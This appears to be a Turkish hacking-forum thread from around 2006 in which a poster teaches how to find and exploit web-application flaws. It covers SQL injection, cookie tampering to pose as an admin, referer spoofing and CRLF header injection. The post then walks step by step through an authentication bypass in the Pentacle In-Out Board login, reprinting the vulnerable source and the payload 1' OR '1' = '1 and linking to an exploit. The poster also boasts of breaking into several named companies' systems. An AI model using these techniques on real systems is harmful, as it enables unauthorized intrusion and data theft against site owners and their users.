Bir sistemin üzerindeki açıklar nasıl bulunur ve kullanılır?

[Stinq]

Evet uzun zamandır yazmayı düşündüğüm bu dökümanımı bugüne kadar elde ettiğim tecrübelerden birebir aktarıyorum.Şuan için web tabanlı uygulamalar ilgili benim kullandığım yöntemleri yazıyorum.

Uygulama hatalarını bulmanın en kolay yolları;

Mevcut sayfalarla oynamak,
Uygulamaya ait formlarla oynamak,
Headerlarla oynamak,
Çerezlerle oynamak,


Uygulamanın kaynak kodlarından yararlanma:
(Genel içerik: çapraz site betiklenmesi (XSS) ve SQL enjeksiyonu)

En basit ve en yararlı olan yöntemdir. Basit dediğime bakmayın oldukça uğraştırır aslında.Nedenine gelince bazen bu sistemlerin hangi uygulamaları kullandığını bulmak oldukça zordur ve eğer public bir uygulama değilse örneğin (PHPNuke,PostNuke gibi) bu yöntemi denemenizi tavsiye etmem.

Kaynak kodunu ele geçirdiğiniz uygulamayı önce yerel bir sunucudaki kendi sisteminize bu uygulamayı destekleyen bir sunucu kurmalısınız (PHP tabanlı uygulamalar için: PHPTriad,ApacheTriad gibi sunucu paketleri sizin için idealdir, ASP ve FrontPage tabanlı sistemler için PWS sizler için idealdir ve PWS Windows ile gelir) bu sunucuyu kurdukdan sonra uygulamayı sunucunuz üzerinde çalıştırın.

Sonra birebir bütün heryerini önce kurcalayın ve bir hata ile karşılaştığınızdaki bu uygulamada var olan açığın ilk adımını bulmuşsunuz demekdir ki,

Bu hata mesajı bazen debug output olarak karşınıza çıkarsa ve alttaki örnek gibiyse

Kod:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or' at line 1

1. satırdaki kodu inceleyin mevcut hatamız SQL ile ilgili gördüğünüz gibi burdaki fonksiyonu ve mevcut SQL sorgusuna dikkat edin ve neler yapılabileceğinizi deneyin.

Bazen hata mesajı almasanızda bir tuhaflık gözünüze çarpar örneğin uygulamamıza yerel sunucumuzdan şöyle eriştiğimizi varsayalım;

Kod:

http://localhost/research/xxxforum/read.php?id=2 or

Eğer read.php bize normalde mesaj yazması gereken yerde hiç birşey göstermediyse.
read.php dosyasını bir metin düzenleyicisi yardımıyla örnek: notepad açın,sonra tek tek bütün kodları inceleyin özellikle read.php'nin sunucudan "GET" yöntemi ile gelen sorgulara hangi fonksiyon ile nasıl yanıt verdiğine bakmalısınız.Eğer fonksiyonda bir terslik gözünüze çarpar ise örnek bir hatalı fonksiyon yazalım.

Kod:

function readip() { @mysql_connect($uo_sqlhost, $uo_sqluser, $uo_sqlpass) or die("Cannot connect to SQL server"); @mysql_select_db($uo_sqlbase) or die("Cannot select database"); $uo_ip = $_GET['SIP']; $uo_query = "SELECT lastvisit FROM users_online WHERE visitor = $uo_ip"; $uo_result = mysql_query($uo_query); echo $uo_result;}

gördüğünüz gibi fonksiyonda bir hatamız mevcut.
Kod:

$uo_query = "SELECT lastvisit FROM users_online WHERE visitor = $uo_ip";

tam olarak düzenli yazılmamış bir SQL sorgusu bu sorguya GET yöntemi ile gelen SIP sorgusundaki bir dikkatsizlik sayesinde çok kolay bir şekilde SQL sorgusu enjekte edebiliriz.
Hatta uzaktan kod çalıştırma dahi yapabiliriz.

Uygulamaları yazan kişiler genelde print (yazdırma) ve view (görüntüleme) sistemlerine ne yazikki dizayndan başka bir önem vermezler ve genelde bütün açıklar bu sayfalarda çıkar.

Eğer uygulamanın kaynak kodlarına erişemezseniz, mevcut uygulamaya ulaştığınız web sunucusundan en yukarda bahsettiğim metodları kullanarak az kafasını kurcalamaya çalışarak bir çok açık bulabilirsiniz.

Genelde büyük ve özel sunuculardaki açıklar böyle bulunmuştur. Bir çok büyük firmanın sistemine girdiğimde (BigFoot,ICQmail,NetZero,Superonline) bu tarz açıklar bulmuştum.

Çerezlerle oynamak:

Çerezler aslında HTTP requestte Cookie: headerıyla sunucuya yolladığımız ve sistemin bizi kolayca hatırlamasını sağlayan değerler.Bu değerlerle ufak oynamalar yaparak kendimizi sistem adminiymiş gibi gösterebiliriz bu metodu artık çoğunuz biliyorsunuz.Fazla anlatmaya gerek yok=)

Referans değişimi (referer spoofing):

Aslında buda headerlar ile oynamak kapsamına girer ancak dikkatsiz programcılar halen bu eski sistemi kullanmaktalar.Bir çoğunuz bu yöntemi porno sitelere girerken çok kullanıyorsunuz.
Burdaki mantık sokete HTTP requesti yollarken sitemizi abudik.com varsayarsak

Kod:

GET admin.asp HTTP/1.1Referer: http://www.abudik.com/login.asp

Şekline ufak bir data değişimi ile sistemin admin paneline girmemizi sağlar.

Satır atlattırma CRLF enjeksiyonu

Buda headerlarla oynamakdan geçer. Basit bir şekilde sokette headera \n\n karakterleri yazdırılır ve eğer sistem bu ufak oyunumuzu yutar ise istediğimiz headerı yazabilir, SQL enjeksiyondan , uzaktan kod çalıştırılmasına kadar bir çok şeyi yapabiliriz.

Bu yöntemlerin hepsi zamanla deneyerek öğrenilecek ve bir süre sonra alışkanlık yapacak yöntemler kendi metodlarınızı kullanarak bu yöntemleri geliştirebilirsiniz.

Bu döküman tamamen kendime aittir ve izinsiz kullanılamaz.
2006-?®©
nuker ****.a nukedx
__________________
Lets play the game with its rules...
Open your lappie: >
<Login:
>root
<Password:
>********
<Welcome , root! ...
>cd /home/root/love/secret/
>perl destroyher.pl
<Usage: destroyher.pl data user pass
>perl destroyher.pl all root 1h4t3y0u
<System will be destroyed sir!
<All datas will be lost...
<Are you sure? (Y/N)
>Y
<Okey then erasing her part...
<Loading ... Loading ... Loading ...
<Operation complete
<There is no way to return these datas sir!
>exit
<logout

Evet Pentacle Giriş Çıkış Tahtası (In-Out Board) sisteminde bulduğum şifre kontrol aşılmasını gösterelim.Pentacle nedir nerde kullanılır derseniz işyerlerinin local intranetleri için yazılmış bir kayıt sistemi kodlara bakalım.
PHP Kod:

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!--#include file="inc.asp"-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>PENTACLE IN-OUT BOARD - Log in</title>
<link href="./skins/1/index.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript">
<!--
function sf(){document.form1.username.focus();}
// -->
</script>
</head>

<body onload=sf()>
<%
Response.Buffer = True
Db = "./dbs/"&dbname
ConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Server.MapPath(db)
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr

if request.form.count <> 0 then
username = trim(request("username"))
userpassword = trim(request("userpassword"))

set rsst = Server.CreateObject ("adodb.recordset")
sqlTextcs = "SELECT *, pt_users.userlocationid as userlocationid FROM pt_users, pt_locations where pt_users.userlocationid=pt_locations.locationid and username ='"&username & "' and userpassword='"& userpassword&"'"
'sqlTextcs = "SELECT * FROM pt_users where username="&username

rsst.Open SqlTextcs, conn, 1, 3
if not rsst.eof then
session("loginstatus")="true"
session("skin")=rsst("userskinid")
session("username") = rsst("username")
session("userid") = rsst("userid")
session("usergroupid") = rsst("usergroupid")
session("userlocationid") = rsst("userlocationid")
useradmin = rsst("useradmin")
if useradmin = True then
session("adminyes") = "True"
elseif useradmin = False then
session("adminyes") = "False"
end if
session("logtimezone") = rsst("locationtimezone")
' if session("prescript") = "" then
session("prescript") = "default.asp?groupid="&session("usergroupid")&"&lo cationid="&session("userlocationid")
' end if
response.redirect session("prescript")
end if
if session("lognumber")<3 then
session("lognumber")= session("lognumber")+1
response.redirect("login.asp")
else
response.redirect("error.asp?eno=6")

end if
else
set rsst = Server.CreateObject ("adodb.recordset")
sqlTextcs = "SELECT * FROM pt_settings"
rsst.Open SqlTextcs, conn, 1, 1
visitorview = rsst("visitorview")



end if
rsst.close
set rsst = Nothing
conn.close
%>

<form name="form1" id="form1" method="post" action="login.asp">
<p><br />
</p>
<table width="98%" border="0">
<tr>
<td colspan="3" align="center"><img src="skins/1/logoa.gif" alt="Pentacle Gold" width="220" height="60" /></td>
</tr>
<tr>
<td colspan="3" align="center"><h2>&nbsp;</h2></td>
</tr>
<tr>
<td width="43%" align="right">User Name:</td>
<td width="3%">&nbsp;</td>
<td width="54%" align="left"> <input name="username" type="text" id="username"/> </td>
</tr>
<tr>
<td align="right">User Password: </td>
<td>&nbsp;</td>
<td align="left"> <input name="userpassword" type="password" id="userpassword" /> </td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="Submit" value="Log in" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td align="left">
<%
if visitorview = true then
%>
<a href="defaultview.asp">View site as a Visitor </a></td>
<%else
%>
Visitor view is turned off.
<%
end if
%>
</tr>
<tr>
<td height="100" colspan="3" align="center" valign="bottom"><p> <span class="style12px">Powered By <a href="http://www.g2soft.net/pentacle/">Pentacle In-Out Board</a><br />
Copyright <a href="http://www.g2soft.net/">G2Soft.Net</a></span> <img src="./images/logo-s.gif" alt="g2soft" width="72" height="16" align="middle" /><span class="style12px">2005</span></p></td>
</tr>
</table>
</form>
</body>
</html>

Evet kodu iyice süzüyoruz ve SQL sorgularına dikkat ediyoruz.
Hemen 31.satıra bakalım
Kod:

sqlTextcs = "SELECT *, pt_users.userlocationid as userlocationid FROM pt_users, pt_locations where pt_users.userlocationid=pt_locations.locationid and username ='"&username & "' and userpassword='"& userpassword&"'"

gördüğünüz gibi amcamız bir güzel kodu yazmış ve hatta '"&Variable&"' kullanarak ' larla birleştirmiş ancak bunu iyice süzmemiş
' larla birleştirmesi bizim işimize yarayacak nedenmi?
dikkatlice bir SQL kodu yazalım ufak ve sistemin kafasını allak bullak etmeden onayı vermesini sağlayacak
sistem bunu nasıl okuyor önce bi buna bakalım
Kod:

SELECT *, pt_users.userlocationid as userlocationid FROM pt_users, pt_locations where pt_users.userlocationid=pt_locations.locationid and username ='birsey' and userpassword='sifre'

diye alıyor buraya kadar hersey masum deniyoruz şifre hatalı dedi..
şifre kısmına formumuzda 1' OR '1' = '1 yazalım basit bi şekilde sorgumuzun anlamı kullanıcı bu ve sifre su ise veya 1 eşittir 1 midir? elbette 1 eşit 1dir , şifre doğru olmasada bunun doğru bir kuram olması nedeniyle sql onayı vericek.
Kod:

SELECT *, pt_users.userlocationid as userlocationid FROM pt_users, pt_locations where pt_users.userlocationid=pt_locations.locationid and username ='birsey' and userpassword='1' OR '1' = '1'

oldu sorgumuz ama biz 1' OR '1' = '1 girdik işte baştaki & bağlama özelliği sayesinde öndeki tırnağa ve sondaki tırnağa sorgumuzu yazdı , ve başarılı bir sql sorgusu elde ettik ve sisteme girdik
www.nukedx.com/?getxpl=13 adresinden uygulamalı exploiti görebilirsiniz.
Pentaclei nette kullanan bir yer bulamazsınız bulsanızda çok az olabilir o yüzden online demo üstünden enjeksiyonu deneyebilirsiniz.
__________________
Lets play the game with its rules...
Open your lappie: >
<Login:
>root
<Password:
>********
<Welcome , root! ...
>cd /home/root/love/secret/
>perl destroyher.pl
<Usage: destroyher.pl data user pass
>perl destroyher.pl all root 1h4t3y0u
<System will be destroyed sir!
<All datas will be lost...
<Are you sure? (Y/N)
>Y
<Okey then erasing her part...
<Loading ... Loading ... Loading ...
<Operation complete
<There is no way to return these datas sir!
>exit
<logout

[rıfkı]

eline saglık güzel paylaşım

[poltergeist]

ellerine saglık . alıntımı sen mi yazdın?

[lebron_onur]

çok saol abi eline sağlık